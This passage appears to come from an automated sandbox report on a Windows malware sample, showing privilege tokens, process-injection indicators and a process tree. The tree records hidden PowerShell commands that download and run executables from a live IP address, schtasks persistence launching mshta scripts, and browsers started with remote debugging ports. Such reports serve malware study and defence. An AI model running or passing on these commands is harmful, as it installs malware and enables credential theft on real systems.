Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3680 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 3680 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 3680 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 3652 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 3652 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 3652 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 3652 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 3652 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2672 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2672 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2672 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2672 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2672 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2672 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2672 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2672 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2672 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 3652 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 3652 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 3652 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 3652 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe
PID 3652 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe
PID 3652 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe
PID 720 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe C:\Windows\SysWOW64\cmd.exe
PID 720 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe C:\Windows\SysWOW64\cmd.exe
PID 720 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe C:\Windows\SysWOW64\cmd.exe
PID 720 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe C:\Windows\SysWOW64\mshta.exe
PID 720 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe C:\Windows\SysWOW64\mshta.exe
PID 720 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe C:\Windows\SysWOW64\mshta.exe
PID 4972 wrote to memory of 3724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4972 wrote to memory of 3724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4972 wrote to memory of 3724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4108 wrote to memory of 2036 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4108 wrote to memory of 2036 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4108 wrote to memory of 2036 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4420 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4420 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 3268 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 3268 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe

"C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe

"C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe"

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2672 -ip 2672

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2672 -s 796

C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe

"C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe"

C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe

"C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn 3U8Dqmawh4D /tr "mshta C:\Users\Admin\AppData\Local\Temp\J7AzTdxv3.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\J7AzTdxv3.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn 3U8Dqmawh4D /tr "mshta C:\Users\Admin\AppData\Local\Temp\J7AzTdxv3.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff993bbcc40,0x7ff993bbcc4c,0x7ff993bbcc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1840,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1828 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2128,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2264 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3168 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3224 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4528 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4256 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" "

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4432,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" any_word

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE

"C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4472,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4712 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4736,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4944 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1728 -s 1712

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "nLlCHmaz9jk" /tr "mshta \"C:\Temp\f71Q9b6DZ.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\f71Q9b6DZ.hta"

C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe

"C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9988446f8,0x7ff998844708,0x7ff998844718

C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe

"C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3008 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

